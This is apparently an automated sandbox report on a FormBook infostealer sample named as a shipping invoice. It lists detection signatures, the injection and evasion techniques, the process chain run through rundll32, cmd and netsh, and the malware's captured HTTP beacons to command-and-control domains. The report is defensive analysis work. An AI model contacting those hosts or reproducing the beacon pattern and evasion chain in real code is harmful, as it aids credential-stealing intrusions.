Analysis Report Shipping INVOICE-BL Shipment..exe

Overview

General Information

Sample Name: Shipping INVOICE-BL Shipment..exe
Analysis ID: 323227
MD5: 579ba39b6a146080ef6481591440e445
SHA1: 06bfc3b47e1ad6a35e10cb4a1edee6c563710107
SHA256: d8d9bb65ea3637fda09488baada0c9b387e0619b7c430b93c8a0fa2d8b489bc1
Tags: Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Hijacks the control flow in another process
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Shipping INVOICE-BL Shipment..exe (PID: 2792 cmdline: 'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe' MD5: 579BA39B6A146080EF6481591440E445)
    • rundll32.exe (PID: 1748 cmdline: rundll32.exe Prehnite,Lychnises MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 6360 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • netsh.exe (PID: 4768 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • cmd.exe (PID: 6908 cmdline: /c del 'C:\Windows\SysWOW64\cmd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author
      2.2.cmd.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      2.2.cmd.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      2.2.cmd.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      2.2.cmd.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      2.2.cmd.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Prehnite.dll, ReversingLabs: Detection: 27%
          Multi AV Scanner detection for submitted file
          Source: Shipping INVOICE-BL Shipment..exe, Virustotal: Detection: 27%
          Source: Shipping INVOICE-BL Shipment..exe, ReversingLabs: Detection: 44%
          Yara detected FormBook
          Source: Yara match, File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 2.2.cmd.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe, Code function: 0_2_00406469 FindFirstFileA,FindClose,0_2_00406469
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe, Code function: 0_2_00402765 FindFirstFileA,0_2_00402765
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe, Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040592E
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 4x nop then pop edi, 2_2_00416227
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 4x nop then pop edi, 2_2_0040C37F
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 4x nop then pop esi, 2_2_004157F1
          Source: C:\Windows\SysWOW64\netsh.exe, Code function: 4x nop then pop edi, 9_2_02F76227
          Source: C:\Windows\SysWOW64\netsh.exe, Code function: 4x nop then pop edi, 9_2_02F6C37F
          Source: C:\Windows\SysWOW64\netsh.exe, Code function: 4x nop then pop esi, 9_2_02F757F1

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49766
          Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49767
          Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 75.126.100.11:80 -> 192.168.2.4:49769
          Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49771
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.carnesveymacr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1Host: www.mehler.photographyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1Host: www.thelonerangernews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.hvcharging.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1Host: www.jddq888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.wtmailer15.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1Host: www.wastie.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.gettingthehelloutofca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1Host: www.caelaabadie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 192.0.78.24
          Source: Joe Sandbox View, IP Address: 34.102.136.180
          Source: Joe Sandbox View, ASN Name: AUTOMATTICUS
          Source: Joe Sandbox View, ASN Name: DIGITALOCEAN-ASNUS
          Source: Joe Sandbox View, ASN Name: GOOGLEUS
          Source: unknown, DNS traffic detected: queries for: www.carnesveymacr.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 26 Nov 2020 14:09:00 GMT | Server: Apache/2.4.6 (CentOS) PHP/7.3.19 | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mqgf/ was not found on this server.</p></body></html>
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe, Code function: 0_2_004053CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004053CB

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)
          Source: Shipping INVOICE-BL Shipment..exe, Static file information: Suspicious name
          Initial sample is a PE file and has a suspicious name
          Source: initial sample, Static PE information: Filename: Shipping INVOICE-BL Shipment..exe
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749B00 NtSetValueKey,9_2_03749B00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374A3B0 NtGetContextThread,9_2_0374A3B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A20 NtResumeThread,9_2_03749A20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A10 NtQuerySection,9_2_03749A10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A00 NtProtectVirtualMemory,9_2_03749A00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A80 NtOpenDirectoryObject,9_2_03749A80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749950 NtQueueApcThread,9_2_03749950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037499D0 NtCreateProcessEx,9_2_037499D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374B040 NtSuspendThread,9_2_0374B040
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749820 NtEnumerateKey,9_2_03749820
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037498F0 NtReadVirtualMemory,9_2_037498F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037498A0 NtWriteVirtualMemory,9_2_037498A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374A770 NtOpenThread,9_2_0374A770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749770 NtSetInformationFile,9_2_03749770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749760 NtOpenProcess,9_2_03749760
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749730 NtQueryVirtualMemory,9_2_03749730
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374A710 NtOpenProcessToken,9_2_0374A710
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037497A0 NtUnmapViewOfSection,9_2_037497A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749670 NtQueryInformationProcess,9_2_03749670
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749660 NtAllocateVirtualMemory,9_2_03749660
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749650 NtQueryValueKey,9_2_03749650
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749610 NtEnumerateValueKey,9_2_03749610
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749560 NtWriteFile,9_2_03749560
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374AD30 NtSetContextThread,9_2_0374AD30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749520 NtWaitForSingleObject,9_2_03749520
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037495F0 NtQueryInformationFile,9_2_037495F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F782B0 NtClose,9_2_02F782B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F78230 NtReadFile,9_2_02F78230
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F78180 NtCreateFile,9_2_02F78180
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F782DA NtClose,9_2_02F782DA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F782AC NtClose,9_2_02F782AC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7817A NtCreateFile,9_2_02F7817A
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0370B150 appears 136 times
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DevCfgUI.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: DevCfgUI.dll.0.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/27@11/6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_100019C0 Cremaster,CertOpenSystemStoreA,EqualSid,FlushFileBuffers,GetWindowThreadProcessId,ReleaseSemaphore,LoadBitmapA,ScrollDC,SetScrollPos,HeapDestroy,ReadFile,1_2_100019C0
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404686
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,0_2_00402138
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Roaming\pkgsJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_01
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\nse53A6.tmpJump to behavior
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
          Source: Shipping INVOICE-BL Shipment..exeVirustotal: Detection: 27%
          Source: Shipping INVOICE-BL Shipment..exeReversingLabs: Detection: 44%
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile read: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe 'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,LychnisesJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: vjscsvr.pdb source: nse53A7.tmp.0.dr
